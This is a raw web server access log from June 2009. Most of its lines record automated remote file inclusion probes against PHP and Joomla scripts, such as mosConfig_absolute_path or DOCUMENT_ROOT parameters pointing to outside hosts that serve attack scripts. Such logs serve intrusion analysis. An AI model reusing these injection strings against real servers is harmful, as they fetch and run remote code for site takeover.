222.231.1.113 - - [10/Jun/2009:00:37:22 -0400] "GET /logs/access_log.Q109051000/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:00:37:37 -0400] "GET /logs/access_log.Q109031800/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:00:38:18 -0400] "GET /logs/access_log.Q109010700%20%20/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:00:38:27 -0400] "GET /logs/access_log.Q109010700%20%20/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.231.1.113 - - [10/Jun/2009:00:38:46 -0400] "GET /logs/access_log.Q109010700/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:00:38:53 -0400] "GET /logs/access_log.Q109031800%20%20/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.231.1.113 - - [10/Jun/2009:00:38:57 -0400] "GET /logs/access_log.Q109031800/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:00:39:00 -0400] "GET /logs/access_log.Q109031800%20%20/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:00:40:09 -0400] "GET /include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:00:40:12 -0400] "GET /logs/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:00:40:12 -0400] "GET /logs/access_log.Q109010700%20%20/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
110.45.144.33 - - [10/Jun/2009:00:40:49 -0400] "GET /logs/error_log.Q109060300/errors.php?error=http://www.yorkza.com/fs/tq/it2.jpg??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
110.45.144.33 - - [10/Jun/2009:00:40:52 -0400] "GET /errors.php?error=http://www.yorkza.com/fs/tq/it2.jpg??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
110.45.144.33 - - [10/Jun/2009:00:40:53 -0400] "GET /logs/errors.php?error=http://www.yorkza.com/fs/tq/it2.jpg??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
87.106.67.146 - - [10/Jun/2009:00:41:28 -0400] "GET /logs/access_log.Q109031800%20%20/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:41:47 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:41:47 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:41:48 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:41:54 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:41:54 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:41:54 -0400] "GET /logs/access_log.Q108062200//admin/business_inc/saveserver.php?thisdir=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:41:54 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:42:06 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:42:06 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:00:42:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [10/Jun/2009:00:42:21 -0400] "GET /logs/access_log.Q108062200//admin/business_inc/saveserver.php?thisdir=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:42:22 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:42:24 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:42:24 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:42:24 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:42:50 -0400] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:42:50 -0400] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:42:50 -0400] "GET /logs/access_log.Q109050700%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:42:50 -0400] "GET /logs/access_log.Q109051700%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.172.33.230 - - [10/Jun/2009:00:43:39 -0400] "GET //agendax/addevent.inc.php?agendax_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 223 "-" "libwww-perl/5.812"
209.172.33.230 - - [10/Jun/2009:00:43:39 -0400] "GET /logs/access_log.Q109052300//agendax/addevent.inc.php?agendax_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.812"
209.172.33.230 - - [10/Jun/2009:00:43:39 -0400] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.812"
190.144.44.36 - - [10/Jun/2009:00:43:46 -0400] "GET /logs/access_log.Q109051600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:44:12 -0400] "GET /logs/access_log.Q109051000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:44:12 -0400] "GET /logs/access_log.Q109052100/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
209.172.33.230 - - [10/Jun/2009:00:44:15 -0400] "GET /logs/access_log.Q109052200//agendax/addevent.inc.php?agendax_path=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.812"
190.144.44.36 - - [10/Jun/2009:00:44:17 -0400] "GET /logs/access_log.Q109052400/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:45:31 -0400] "GET /logs/access_log.Q109051000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
110.45.147.105 - - [10/Jun/2009:00:46:42 -0400] "GET /logs/access_log.Q108052700/errors.php?error=http://www.yorkza.com/fs/tq/it2.jpg??? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
190.144.44.36 - - [10/Jun/2009:00:46:54 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:00:47:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [10/Jun/2009:00:47:59 -0400] "GET /logs/access_log.Q109051000%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:48:31 -0400] "GET /logs/access_log.Q109052200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:48:31 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:48:31 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:49:02 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:49:02 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:49:02 -0400] "GET /logs/access_log.Q109052200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:49:21 -0400] "GET /logs/access_log.Q109051100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.249.71.14 - - [10/Jun/2009:00:49:28 -0400] "GET /logs/error_log.Q109020200 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
110.45.144.33 - - [10/Jun/2009:00:49:44 -0400] "GET /logs/access_log.Q108052700/errors.php?error=http://www.yorkza.com/fs/tq/it2.jpg??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
222.239.76.25 - - [10/Jun/2009:00:49:50 -0400] "GET /logs/access_log.Q109051100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.153.28.140 - - [10/Jun/2009:00:51:03 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
122.153.28.140 - - [10/Jun/2009:00:51:07 -0400] "GET /logs/access_log.Q109051100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.153.28.140 - - [10/Jun/2009:00:51:07 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.153.28.140 - - [10/Jun/2009:00:51:07 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
122.153.28.140 - - [10/Jun/2009:00:51:07 -0400] "GET /logs/access_log.Q109051100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.153.28.140 - - [10/Jun/2009:00:51:07 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.105.197.226 - - [10/Jun/2009:00:51:32 -0400] "GET /errors.php?error=http://www.stmaryofthecataract.com/images/save.jpg? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
113.29.225.7 - - [10/Jun/2009:00:51:39 -0400] "GET //include/admin.lib.inc.php?site_path=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
113.29.225.7 - - [10/Jun/2009:00:51:39 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
113.29.225.7 - - [10/Jun/2009:00:51:39 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
113.29.225.7 - - [10/Jun/2009:00:51:58 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:00:52:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.153.28.140 - - [10/Jun/2009:00:52:27 -0400] "GET /logs/access_log.Q109052900///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.153.28.140 - - [10/Jun/2009:00:52:28 -0400] "GET /logs/access_log.Q109052900///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:53:04 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
190.144.44.36 - - [10/Jun/2009:00:53:04 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
190.144.44.36 - - [10/Jun/2009:00:53:04 -0400] "GET /logs/error_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
113.29.225.7 - - [10/Jun/2009:00:53:10 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
113.29.225.7 - - [10/Jun/2009:00:53:10 -0400] "GET //include/admin.lib.inc.php?site_path=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
113.29.225.7 - - [10/Jun/2009:00:53:13 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:54:01 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:54:01 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:54:18 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:54:18 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
113.29.225.7 - - [10/Jun/2009:00:54:32 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
113.29.225.7 - - [10/Jun/2009:00:55:06 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
122.153.28.140 - - [10/Jun/2009:00:55:08 -0400] "GET /logs/access_log.Q109051100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.153.28.140 - - [10/Jun/2009:00:55:09 -0400] "GET /logs/access_log.Q109051100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.153.28.140 - - [10/Jun/2009:00:55:22 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
122.153.28.140 - - [10/Jun/2009:00:55:22 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.153.28.140 - - [10/Jun/2009:00:55:22 -0400] "GET /logs/access_log.Q109052500///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.153.28.140 - - [10/Jun/2009:00:55:31 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
122.153.28.140 - - [10/Jun/2009:00:55:31 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.153.28.140 - - [10/Jun/2009:00:55:31 -0400] "GET /logs/access_log.Q109052500///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.153.28.140 - - [10/Jun/2009:00:55:35 -0400] "GET /logs/access_log.Q109052900%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.153.28.140 - - [10/Jun/2009:00:55:35 -0400] "GET /logs/access_log.Q109052900%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
217.125.38.117 - - [10/Jun/2009:00:56:09 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
217.125.38.117 - - [10/Jun/2009:00:56:10 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
222.231.1.113 - - [10/Jun/2009:00:56:18 -0400] "GET /logs/access_log.Q109051000/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.231.1.113 - - [10/Jun/2009:00:56:18 -0400] "GET /logs/access_log.Q109052300/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
122.153.28.140 - - [10/Jun/2009:00:56:23 -0400] "GET /logs/access_log.Q109051600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:00:56:24 -0400] "GET ////??_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:00:56:24 -0400] "GET /logs////??_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 4909 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:00:56:36 -0400] "GET ////??_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:00:56:36 -0400] "GET /logs////??_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 4909 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:00:56:36 -0400] "GET ////??_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:00:56:36 -0400] "GET /logs////??_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 4909 "-" "Mozilla/5.0"
122.153.28.140 - - [10/Jun/2009:00:56:57 -0400] "GET /logs/access_log.Q109051600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:00:57:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.239.76.25 - - [10/Jun/2009:00:57:14 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:57:14 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:57:14 -0400] "GET /logs/access_log.Q109010700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:57:14 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:57:14 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:57:14 -0400] "GET /logs/access_log.Q109010700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.153.28.140 - - [10/Jun/2009:00:58:44 -0400] "GET /logs/access_log.Q109052500%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.153.28.140 - - [10/Jun/2009:00:58:56 -0400] "GET /logs/access_log.Q109052500%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.153.28.140 - - [10/Jun/2009:00:59:19 -0400] "GET /logs/access_log.Q109051600%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.153.28.140 - - [10/Jun/2009:00:59:25 -0400] "GET /logs/access_log.Q109051600%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:00:59:49 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:00:59:49 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:00:59:50 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:00:59:50 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:11:58 -0400] "GET /logs/access_log.Q109051800%20%20/errors.php?error=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
